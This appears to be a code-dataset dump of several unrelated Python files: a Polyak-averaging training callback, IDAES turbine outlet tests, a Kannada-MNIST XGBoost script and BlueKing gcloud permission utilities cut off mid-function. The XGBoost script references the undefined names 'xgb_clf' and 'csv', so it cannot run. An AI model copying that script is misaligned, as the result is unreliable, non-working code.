parameters, not the parameters used for computing\n the gradients during training.\n \"\"\"\n\n def __init__(self, model, save_path = None, kc=10, save_freq = 1):\n self.__dict__.update(locals())\n\n updates = {}\n k = sharedX(0.)\n self.param_to_mean = {}\n for param in model.get_params():\n mean = sharedX(param.get_value())\n assert type(mean) == type(param)\n self.param_to_mean[param] = mean\n updates[mean] = k / (k + kc) * mean + kc / (k + kc) * param\n updates[k] = k + 1.\n self.avg = function([], updates = updates)\n self._count = 0\n self.kc = kc\n self.k = k\n\n def __call__(self, model, dataset, algorithm):\n if self._count > 0 and self._count % self.save_freq == 0:\n self.avg()\n saved_params = {}\n for param in model.get_params():\n saved_params[param] = param.get_value()\n param.set_value(self.param_to_mean[param].get_value())\n serial.save(self.save_path, model)\n for param in model.get_params():\n param.set_value(saved_params[param])\n self._count += 1\n\n", "sub_path": "polyak.py", "file_name": "polyak.py", "file_ext": "py", "file_size_in_byte": 3034, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pylearn2.training_callbacks.training_callback.TrainingCallback", "line_number": 23, "usage_type": "name"}, {"api_name": "pylearn2.utils.sharedX", "line_number": 58, "usage_type": "call"}, {"api_name": "pylearn2.utils.sharedX", "line_number": 61, "usage_type": "call"}, {"api_name": "theano.function", "line_number": 66, "usage_type": "call"}, {"api_name": "pylearn2.utils.serial.save", "line_number": 78, "usage_type": "call"}, {"api_name": "pylearn2.utils.serial", "line_number": 78, "usage_type": "name"}]} +{"seq_id": "338040453", "text": "#################################################################################\n# The Institute for the Design of Advanced Energy Systems Integrated Platform\n# Framework (IDAES IP) was produced under the DOE Institute for the\n# Design of Advanced Energy Systems (IDAES).\n#\n# Copyright (c) 2018-2023 by the software owners: The Regents of the\n# University of California, through Lawrence Berkeley National Laboratory,\n# National Technology & Engineering Solutions of Sandia, LLC, Carnegie Mellon\n# University, West Virginia University Research Corporation, et al.\n# All rights reserved. Please see the files COPYRIGHT.md and LICENSE.md\n# for full copyright and license information.\n#################################################################################\n\"\"\"\nTests for turbine outlet model.\n\nAuthor: John Eslick\n\"\"\"\nimport pytest\n\nfrom pyomo.environ import ConcreteModel, TransformationFactory, units as pyunits\n\nfrom idaes.core import FlowsheetBlock\nfrom idaes.models_extra.power_generation.unit_models.helm import HelmTurbineOutletStage\nfrom idaes.models.properties import iapws95\nfrom idaes.core.util.model_statistics import (\n degrees_of_freedom,\n activated_equalities_generator,\n)\nfrom idaes.core.solvers import get_solver\nfrom idaes.models.properties.general_helmholtz import helmholtz_available\n\n# Set up solver\nsolver = get_solver()\n\n\n@pytest.fixture()\ndef build_turbine():\n m = ConcreteModel()\n m.fs = FlowsheetBlock(dynamic=False)\n m.fs.properties = iapws95.Iapws95ParameterBlock()\n m.fs.turb = HelmTurbineOutletStage(property_package=m.fs.properties)\n return m\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.fixture()\ndef build_turbine_dyn():\n m = ConcreteModel()\n m.fs = FlowsheetBlock(dynamic=True, time_units=pyunits.s)\n m.fs.properties = iapws95.Iapws95ParameterBlock()\n m.fs.turb = HelmTurbineOutletStage(dynamic=False, property_package=m.fs.properties)\n return m\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.mark.unit\ndef test_basic_build(build_turbine):\n \"\"\"Make a turbine model and make sure it doesn't throw exception\"\"\"\n m = build_turbine\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.mark.component\ndef test_initialize(build_turbine):\n \"\"\"Initialize a turbine model\"\"\"\n m = build_turbine\n # set inlet\n m.fs.turb.inlet.enth_mol[0].value = 47115\n m.fs.turb.inlet.flow_mol[0].value = 15000\n m.fs.turb.inlet.pressure[0].value = 8e4\n m.fs.turb.outlet.pressure[0].fix(4e4)\n\n m.fs.turb.initialize(outlvl=1)\n\n eq_cons = activated_equalities_generator(m)\n for c in eq_cons:\n assert abs(c.body() - c.lower) < 1e-4\n assert degrees_of_freedom(m) == 2 # inlet was't fixed and still shouldn't be\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.mark.component\ndef test_initialize_calc_cf(build_turbine):\n \"\"\"Initialize a turbine model\"\"\"\n m = build_turbine\n # set inlet\n m.fs.turb.inlet.enth_mol[0].value = 47115\n m.fs.turb.inlet.flow_mol[0].value = 15000\n m.fs.turb.inlet.pressure[0].value = 8e4\n m.fs.turb.outlet.pressure[0].fix(4e4)\n\n m.fs.turb.initialize(calculate_cf=True)\n\n eq_cons = activated_equalities_generator(m)\n for c in eq_cons:\n assert abs(c.body() - c.lower) < 1e-4\n\n m.fs.turb.inlet.enth_mol[0].fix()\n m.fs.turb.inlet.pressure[0].fix()\n\n solver.solve(m)\n assert m.fs.turb.inlet.flow_mol[0].value == pytest.approx(15000)\n assert degrees_of_freedom(m) == 0\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.mark.component\ndef test_initialize_calc_cf_dyn(build_turbine_dyn):\n \"\"\"Initialize a turbine model\"\"\"\n m = build_turbine_dyn\n discretizer = TransformationFactory(\"dae.finite_difference\")\n discretizer.apply_to(m, nfe=4, wrt=m.fs.time, scheme=\"BACKWARD\")\n # set inlet\n m.fs.turb.inlet.enth_mol.fix(47115)\n for t in m.fs.turb.inlet.flow_mol:\n m.fs.turb.inlet.flow_mol[t].value = 15000\n m.fs.turb.inlet.pressure.fix(8e4)\n m.fs.turb.outlet.pressure.fix(4e4)\n m.fs.turb.flow_coeff.fix()\n\n assert degrees_of_freedom(m) == 0\n m.fs.turb.initialize(calculate_cf=True)\n eq_cons = activated_equalities_generator(m)\n for c in eq_cons:\n assert abs(c.body() - c.lower) < 1e-4\n solver.solve(m)\n assert m.fs.turb.inlet.flow_mol[0].value == pytest.approx(15000)\n assert degrees_of_freedom(m) == 0\n\n\n@pytest.mark.skipif(not iapws95.iapws95_available(), reason=\"IAPWS not available\")\n@pytest.mark.unit\ndef test_get_stream_table_contents(build_turbine):\n stable = build_turbine.fs.turb._get_stream_table_contents()\n\n expected = {\n \"Units\": {\n \"Mass Flow\": getattr(pyunits.pint_registry, \"kg/s\"),\n \"Molar Flow\": getattr(pyunits.pint_registry, \"mol/s\"),\n \"Molar Enthalpy\": getattr(pyunits.pint_registry, \"J/mol\"),\n \"P\": getattr(pyunits.pint_registry, \"Pa\"),\n \"T\": getattr(pyunits.pint_registry, \"K\"),\n \"Vapor Fraction\": getattr(pyunits.pint_registry, \"dimensionless\"),\n },\n \"Inlet\": {\n \"Mass Flow\": pytest.approx(0.01801527, rel=1e-5),\n \"Molar Flow\": pytest.approx(1.0, rel=1e-5),\n \"Molar Enthalpy\": pytest.approx(0.01102139, rel=1e-5),\n \"P\": pytest.approx(11032300, rel=1e-5),\n \"T\": pytest.approx(270.4877, rel=1e-5),\n \"Vapor Fraction\": pytest.approx(0.0, abs=1e-5),\n },\n \"Outlet\": {\n \"Mass Flow\": pytest.approx(0.01801527, rel=1e-5),\n \"Molar Flow\": pytest.approx(1.0, rel=1e-5),\n \"Molar Enthalpy\": pytest.approx(0.01102139, rel=1e-5),\n \"P\": pytest.approx(11032300, rel=1e-5),\n \"T\": pytest.approx(270.4877, rel=1e-5),\n \"Vapor Fraction\": pytest.approx(0.0, abs=1e-5),\n },\n }\n\n assert stable.to_dict() == expected\n", "sub_path": "idaes/models_extra/power_generation/unit_models/helm/tests/test_turbine_outlet.py", "file_name": "test_turbine_outlet.py", "file_ext": "py", "file_size_in_byte": 6040, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "idaes.core.solvers.get_solver", "line_number": 33, "usage_type": "call"}, {"api_name": "pyomo.environ.ConcreteModel", "line_number": 38, "usage_type": "call"}, {"api_name": "idaes.core.FlowsheetBlock", "line_number": 39, "usage_type": "call"}, {"api_name": "idaes.models.properties.iapws95.Iapws95ParameterBlock", "line_number": 40, "usage_type": "call"}, {"api_name": "idaes.models.properties.iapws95", "line_number": 40, "usage_type": "name"}, {"api_name": "idaes.models_extra.power_generation.unit_models.helm.HelmTurbineOutletStage", "line_number": 41, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 36, "usage_type": "call"}, {"api_name": "pyomo.environ.ConcreteModel", "line_number": 48, "usage_type": "call"}, {"api_name": "idaes.core.FlowsheetBlock", "line_number": 49, "usage_type": "call"}, {"api_name": "pyomo.environ.units.s", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 49, "usage_type": "name"}, {"api_name": "idaes.models.properties.iapws95.Iapws95ParameterBlock", "line_number": 50, "usage_type": "call"}, {"api_name": "idaes.models.properties.iapws95", "line_number": 50, "usage_type": "name"}, {"api_name": "idaes.models_extra.power_generation.unit_models.helm.HelmTurbineOutletStage", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 45, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 45, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 45, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 55, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 55, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 55, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 56, "usage_type": "attribute"}, {"api_name": "idaes.core.util.model_statistics.activated_equalities_generator", "line_number": 75, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.degrees_of_freedom", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 62, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 62, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 62, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 63, "usage_type": "attribute"}, {"api_name": "idaes.core.util.model_statistics.activated_equalities_generator", "line_number": 94, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 102, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.degrees_of_freedom", "line_number": 103, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 81, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 81, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 81, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pyomo.environ.TransformationFactory", "line_number": 111, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.degrees_of_freedom", "line_number": 121, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.activated_equalities_generator", "line_number": 123, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 127, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.degrees_of_freedom", "line_number": 128, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 106, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 106, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 106, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 138, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 139, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 139, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 140, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 141, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 142, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 143, "usage_type": "name"}, {"api_name": "pytest.approx", "line_number": 146, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 147, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 148, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 149, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 150, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 151, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 154, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 155, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 156, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 157, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 158, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 159, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 131, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 131, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.iapws95.iapws95_available", "line_number": 131, "usage_type": "call"}, {"api_name": "idaes.models.properties.iapws95", "line_number": 131, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 132, "usage_type": "attribute"}]} +{"seq_id": "542863854", "text": "# file processing\nimport os, sys\n\n# data processing\nimport numpy as np\nimport pandas as pd\n\n# xgboost runtime\nimport xgboost as xgb\n\n# preprocess\nfrom sklearn.model_selection import train_test_split\n\n# ignore warning\nimport warnings\nwarnings.filterwarnings('ignore')\n\nif __name__ == \"__main__\":\n train = pd.read_csv(\"../../data/raw/Kannada-MNIST/train.csv\")\n test = pd.read_csv(\"../../data/raw/Kannada-MNIST/test.csv\")\n\n # Split train and test data\n column = ['pixel{}'.format(i) for i in range(784)]\n x_train, x_valid, y_train, y_valid = train_test_split(train[column], train['label'], test_size=0.1)\n\n # Setting dataset to xgboost runtime type.\n dtrain = xgb.DMatrix(x_train, label=y_train)\n dvalid = xgb.DMatrix(x_valid, label=y_valid)\n\n # Setting parameters.\n # Decide Task method, Metrics, etc.\n xgb_params = {\n \"objective\" : \"multi:softmax\",\n \"eval_metric\" : \"mlogloss\",\n \"num_class\" : 10,\n \"max_depth\" : 12,\n \"eta\" : 0.05,\n \"subsample\" : 0.9,\n \"colsample_bytree\" : 0.9,\n }\n \n # train\n watchlist = [(dvalid, 'eval'), (dtrain, 'train')]\n clf = xgb.train(\n params=xgb_params,\n dtrain=dtrain,\n num_boost_round=4000,\n evals=watchlist,\n early_stopping_rounds=20,\n verbose_eval=20\n )\n res = xgb_clf.predict( xgb.DMatrix(test[column]) ).astype(int)\n\n with open(\"../../data/processed/xgboost_simple.csv\", \"w\") as f:\n csv.write(res)\n", "sub_path": "src/processing/xgboost.py", "file_name": "xgboost.py", "file_ext": "py", "file_size_in_byte": 1485, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 24, "usage_type": "call"}, {"api_name": "xgboost.DMatrix", "line_number": 27, "usage_type": "call"}, {"api_name": "xgboost.DMatrix", "line_number": 28, "usage_type": "call"}, {"api_name": "xgboost.train", "line_number": 44, "usage_type": "call"}, {"api_name": "xgboost.DMatrix", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "369606132", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community\nEdition) available.\nCopyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\nhttp://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\n\nimport calendar\nimport datetime\nimport json\nimport re\nimport logging\nimport time\nimport pytz\n\nfrom django.core.cache import cache\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom django.utils import six\nfrom guardian.shortcuts import assign_perm\n\nfrom gcloud.conf import settings\nfrom gcloud import exceptions\nfrom gcloud.core import roles\nfrom gcloud.core.constant import AE\nfrom gcloud.core.models import Business, BusinessGroupMembership\nfrom gcloud.core.api_adapter import (\n is_user_functor,\n get_operate_user_list,\n is_user_auditor,\n get_auditor_user_list,\n get_user_info,\n adapt_get_user_data\n)\n\nlogger = logging.getLogger(\"root\")\nget_client_by_user = settings.ESB_GET_CLIENT_BY_USER\nCACHE_PREFIX = __name__.replace('.', '_')\nDEFAULT_CACHE_TIME_FOR_CC = settings.DEFAULT_CACHE_TIME_FOR_CC\n\n\n# LifeCycle:'1':测试中, '2':已上线, '3': 停运, 其他如'0'、''是非法值\ndef _get_user_business_list(request, use_cache=True):\n \"\"\"Get authorized business list for a exact username.\n\n :param object request: django request object.\n :param bool use_cache: (Optional)\n \"\"\"\n user = request.user\n cache_key = \"%s_get_user_business_list_%s\" % (CACHE_PREFIX, user.username)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n user_info = _get_user_info(request)\n client = get_client_by_user(request.user.username)\n result = client.cc.search_business({\n 'bk_supplier_account': user_info['bk_supplier_account'],\n 'condition': {\n 'bk_data_status': {'$in': ['enable', 'disabled', None]},\n '$or': [{'bk_biz_developer': {\"$regex\": user.username}},\n {'bk_biz_productor': {\"$regex\": user.username}},\n {'bk_biz_maintainer': {\"$regex\": user.username}},\n {'bk_biz_tester': {\"$regex\": user.username}}]\n }\n })\n\n if result['result']:\n data = result['data']['info']\n cache.set(cache_key, data, DEFAULT_CACHE_TIME_FOR_CC)\n elif result.get('code') in ('20101', 20101):\n raise exceptions.Unauthorized(result['message'])\n elif result.get('code') in ('20103', 20103, '20201', 20201,\n '20202', 20202):\n raise exceptions.Forbidden(result['message'])\n else:\n raise exceptions.APIError(\n 'cc',\n 'search_business',\n result.get('detail_message', result['message'])\n )\n\n return data\n\n\ndef _get_user_info(request, use_cache=True):\n \"\"\"\n 获取用户基本信息\n @param request:\n @param use_cache:\n @return:\n \"\"\"\n user = request.user\n cache_key = \"%s_get_user_info_%s\" % (CACHE_PREFIX, user.username)\n data = cache.get(cache_key)\n if not (use_cache and data):\n userinfo = get_user_info(request)\n userinfo.setdefault('code', -1)\n if userinfo['result']:\n data = userinfo['data']\n if data:\n cache.set(cache_key, data, DEFAULT_CACHE_TIME_FOR_CC)\n elif userinfo.get('code') in ('20101', 20101):\n raise exceptions.Unauthorized(userinfo['message'])\n elif userinfo.get('code') in ('20103', 20103, '20201', 20201,\n '20202', 20202):\n raise exceptions.Forbidden(userinfo['message'])\n else:\n raise exceptions.APIError(\n 'bk_api',\n 'get_user_info',\n userinfo.get('detail_message', userinfo['message'])\n )\n return data\n\n\ndef _get_business_info(request, app_id, use_cache=True, use_maintainer=False):\n \"\"\"Get detail infomations for a exact app_id.\n\n @param object request: django request object.\n @param int app_id: cc_id of core.business model.\n @param use_maintainer: 使用运维身份请求\n \"\"\"\n username = request.user.username\n business = Business.objects.get(cc_id=app_id)\n cache_key = \"%s_get_business_info_%s_%s\" % (CACHE_PREFIX, app_id, username)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n if use_maintainer:\n client = get_client_by_user_and_biz_id(username, app_id)\n else:\n client = get_client_by_user(request.user.username)\n result = client.cc.search_business({\n 'bk_supplier_account': business.cc_owner,\n 'condition': {\n 'bk_biz_id': int(app_id)\n }\n })\n\n if result['result']:\n if not result['data']['info']:\n raise exceptions.Forbidden()\n data = result['data']['info'][0]\n elif result.get('code') in ('20101', 20101):\n raise exceptions.Unauthorized(result['message'])\n elif result.get('code') in ('20103', 20103, '20201', 20201,\n '20202', 20202):\n raise exceptions.Forbidden(result['message'])\n else:\n raise exceptions.APIError(\n 'cc',\n 'get_app_by_id',\n result.get('detail_message', result['message'])\n )\n\n cache.set(cache_key, data, DEFAULT_CACHE_TIME_FOR_CC)\n\n return data\n\n\ndef add_maintainer_to_biz(user, business_list):\n user_group_name = [g.name for g in user.groups.all()]\n\n for business in business_list:\n group_name = convert_group_name(business.cc_id, roles.MAINTAINERS)\n if group_name in user_group_name:\n continue\n\n group, _ = Group.objects.get_or_create(name=group_name)\n\n # assign view business perm for all roles\n assign_perm('view_business', group, business)\n assign_perm('manage_business', group, business)\n\n BusinessGroupMembership.objects.get_or_create(\n business=business,\n group=group\n )\n user.groups.add(group)\n\n\ndef update_relationships(request, obj, extras, created=False, use_cache=True):\n \"\"\"\n Update business-group(role) relationships & group-user memberships\n \"\"\"\n cache_key = \"%s_update_relationships_%s\" % (CACHE_PREFIX, obj.cc_id)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n groups = {}\n # first, create related groups if not exist\n for role in roles.ALL_ROLES:\n group_name = convert_group_name(obj.cc_id, role)\n group, group_created = Group.objects.get_or_create(name=group_name) # TODO\n groups[group_name] = (group, group_created)\n\n if group_created:\n # assign view business perm for all roles\n assign_perm('view_business', group, obj)\n\n # assign manage business perm only for admin roles\n if role in roles.ADMIN_ROLES:\n assign_perm('manage_business', group, obj)\n\n with transaction.atomic():\n try:\n Business.objects.select_for_update().get(pk=obj.pk)\n except Business.DoesNotExist:\n return None\n\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n # If not created, clear business to group memberships\n if not created:\n obj.groups.clear()\n\n for group_name in groups:\n group, created = groups[group_name]\n # If not created, clear group to user memberships\n if not created:\n group.user_set.clear()\n\n BusinessGroupMembership.objects.get_or_create(\n business=obj,\n group=group\n )\n\n role = group_name.split('\\x00')[1]\n resp_data_role = '{}'.format(roles.CC_V2_ROLE_MAP.get(role, role))\n role_users = extras.get(resp_data_role) or ''\n user_model = get_user_model()\n user_list = role_users.split(',')\n\n # 职能化人员单独授权\n if role == roles.FUNCTOR:\n user_list = get_operate_user_list(request)\n\n # 审计人员单独授权\n if role == roles.AUDITOR:\n user_list = get_auditor_user_list(request)\n\n for username in user_list:\n if username:\n user, _ = user_model.objects.get_or_create(\n username=username)\n user.groups.add(group)\n\n cache.set(cache_key, True, DEFAULT_CACHE_TIME_FOR_CC)\n\n\ndef prepare_view_all_business(request):\n \"\"\"\n @summary:职能化和审计人员授权所有业务的查看权限\n \"\"\"\n bizs = Business.objects.all()\n User = get_user_model()\n user = User.objects.get(username=request.user.username)\n\n for obj in bizs:\n group_name = convert_group_name(obj.cc_id, roles.AUDITOR)\n group, created = Group.objects.get_or_create(name=group_name)\n\n if created:\n # assign view business perm for all roles\n assign_perm('view_business', group, obj)\n\n BusinessGroupMembership.objects.get_or_create(\n business=obj,\n group=group\n )\n\n user.groups.add(group)\n\n\ndef get_business_obj(request, cc_id, use_cache=True, use_maintainer=False):\n cache_key = \"%s_get_business_obj_%s\" % (CACHE_PREFIX, cc_id)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n info = _get_business_info(request, cc_id, use_cache, use_maintainer)\n defaults = {\n 'cc_name': info['bk_biz_name'],\n 'cc_owner': info['bk_supplier_account'],\n 'cc_company': info.get('bk_supplier_id') or 0,\n 'time_zone': info['time_zone'],\n 'life_cycle': info.get('life_cycle', '')\n }\n obj, created = Business.objects.update_or_create(\n cc_id=info['bk_biz_id'],\n defaults=defaults\n )\n\n data = (obj, created, info)\n\n cache.set(cache_key, (obj, False, info), DEFAULT_CACHE_TIME_FOR_CC)\n\n return data\n\n\ndef _update_user_info(info):\n info = adapt_get_user_data(info)\n User = get_user_model()\n User.objects.update_or_create(\n username=info['uin'],\n defaults=info\n )\n\n\ndef update_user_info(request, cc_id, use_cache=True):\n cache_key = \"%s_update_user_info_%s\" % (CACHE_PREFIX, cc_id)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n result = get_user_info(request)\n if result['result']:\n _update_user_info(result['data'])\n elif result['code'] in ('20101', 20101):\n raise exceptions.Unauthorized(result['message'])\n elif result['code'] in ('20103', 20103):\n raise exceptions.Forbidden(result['message'])\n else:\n raise exceptions.APIError(\n settings.ESB_AUTH_COMPONENT_SYSTEM,\n 'get_user',\n result.get('detail_message', result['message'])\n )\n\n cache.set(cache_key, True, DEFAULT_CACHE_TIME_FOR_CC)\n\n\ndef prepare_business(request, cc_id, use_cache=True):\n # first, get the business object\n user = request.user\n if user.is_superuser or is_user_functor(request) or is_user_auditor(request):\n try:\n obj, created, extras = get_business_obj(request, cc_id, use_cache)\n except Exception:\n objs = Business.objects.filter(cc_id=cc_id)\n if not objs.exists():\n raise exceptions.Forbidden()\n obj = objs[0]\n extras = {}\n else:\n obj, created, extras = get_business_obj(request, cc_id, use_cache)\n\n # access archived business is not allowed\n if not obj.available():\n raise exceptions.Forbidden()\n\n # then, update business object relationships\n if extras:\n update_relationships(request, obj, extras)\n\n # update user info (uin and nick name)\n update_user_info(request, cc_id)\n\n return obj\n\n\ndef is_user_relate_business(user, biz):\n biz_roles = set()\n for role in roles.CC_V2_ROLE_MAP.values():\n members = str(biz[role]).split(',')\n biz_roles.update(members)\n\n return user.username in biz_roles\n\n\ndef prepare_user_business(request, use_cache=True):\n user = request.user\n cache_key = \"%s_prepare_user_business_%s\" % (CACHE_PREFIX, user.username)\n data = cache.get(cache_key)\n maintainer_key = roles.CC_V2_ROLE_MAP[roles.MAINTAINERS]\n\n if not (use_cache and data):\n data = []\n biz_list = _get_user_business_list(request, use_cache)\n maintainer_business = []\n\n for biz in biz_list:\n if biz['bk_biz_name'] == u\"资源池\":\n continue\n defaults = {\n 'cc_name': biz['bk_biz_name'],\n 'cc_owner': biz['bk_supplier_account'],\n 'cc_company': biz.get('bk_supplier_id') or 0,\n 'time_zone': biz.get('time_zone', ''),\n 'life_cycle': biz.get('life_cycle', ''),\n 'status': biz.get('bk_data_status', 'enable')\n }\n\n if defaults['status'] == 'disabled':\n # do not create model for archived business\n try:\n Business.objects.get(cc_id=biz['bk_biz_id'])\n except Business.DoesNotExist:\n continue\n\n # update business status\n obj, _ = Business.objects.update_or_create(\n cc_id=biz['bk_biz_id'],\n defaults=defaults\n )\n\n # only append business which relate to user and not been archived\n if obj not in data and is_user_relate_business(user, biz) and obj.available():\n data.append(obj)\n\n if user.username in set(str(biz[maintainer_key]).split(',')):\n maintainer_business.append(obj)\n\n # 为该用户有运维权限的业务添加运维角色,防止第一次进入时拉取不到业务列表\n add_maintainer_to_biz(user, maintainer_business)\n\n cache.set(cache_key, data, DEFAULT_CACHE_TIME_FOR_CC)\n\n return data\n\n\ndef get_biz_maintainer_info(biz_cc_id, username='', use_in_context=False):\n \"\"\"\n 获取当前业务下登录过的运维人员信息,包括 operator和auth_token\n @param biz_cc_id:\n @param username: 当前操作者\n @return: operator 业务运维\n @return: auth_token 业务运维的认证信息\n \"\"\"\n business = Business.objects.get(cc_id=biz_cc_id)\n role = roles.MAINTAINERS\n group_name = convert_group_name(biz_cc_id, role)\n try:\n group = Group.objects.get(name=group_name)\n except Group.DoesNotExist:\n logger.error('get_biz_maintainer_info raise error, group[%s] does not exist' % group_name)\n return '', ''\n maintainers = group.user_set.order_by('last_login')\n\n # 如果是用在流程的 context 中且业务打开了一直使用任务执行这开关\n if use_in_context and business.always_use_executor and business.executor:\n user = maintainers.filter(username=business.executor)\n if user.exists():\n return user[0].username, user[0].auth_token\n\n # 如果操作者就是运维,则首先尝试返回自己的信息\n if username:\n user = maintainers.filter(username=username)\n if user.exists():\n return username, user[0].auth_token\n\n # 如果业务执行者未从业务运维列表中删除,则使用业务执行者\n if business.executor:\n user = maintainers.filter(username=business.executor)\n if user.exists():\n return user[0].username, user[0].auth_token\n\n # 随机取包含 ESB 鉴权信息的运维\n authorized_maintainer = ''\n auth_token = ''\n if maintainers:\n authorized_maintainer = maintainers[0].username\n auth_token = maintainers[0].auth_token\n\n return authorized_maintainer, auth_token\n\n\ndef get_client_by_user_and_biz_id(username, biz_cc_id):\n \"\"\"\n @summary: 根据用户和业务获取运维身份的client\n :param username:\n :param biz_cc_id:\n :return:\n \"\"\"\n # 首先以存在auth_token的运维身份调用接口\n maintainer, __ = get_biz_maintainer_info(biz_cc_id, username)\n if maintainer:\n return get_client_by_user(maintainer)\n\n # 无任何业务的运维auth_token信息,只能以自己身份执行\n return get_client_by_user(username)\n\n\ndef time_now_str():\n return timezone.localtime(timezone.now()).strftime('%Y%m%d%H%M%S')\n\n\ndef strftime_with_timezone(utc_time):\n if utc_time:\n return timezone.localtime(utc_time).strftime('%Y-%m-%d %H:%M:%S %z')\n else:\n return ''\n\n\ndef convert_readable_username(username):\n \"\"\"将用户名转换成昵称\"\"\"\n return username\n\n\ndef name_handler(name, max_length):\n \"\"\"名称处理\"\"\"\n # 替换特殊字符\n name_str = re.compile(r'[<>.,;~!@#^&*¥\\'\\\"]+').sub('', name)\n # 长度截取\n return name_str[:max_length]\n\n\ndef timestamp_to_datetime(timestamp):\n \"\"\"\n 时间戳转为datetime类型\n :param timestamp:\n :return:\n \"\"\"\n try:\n # 前端是传过来的是毫秒需要进行转换为秒\n timestamp = timestamp / 1000\n # 时间戳转为 datetime\n return timezone.datetime.fromtimestamp(timestamp, 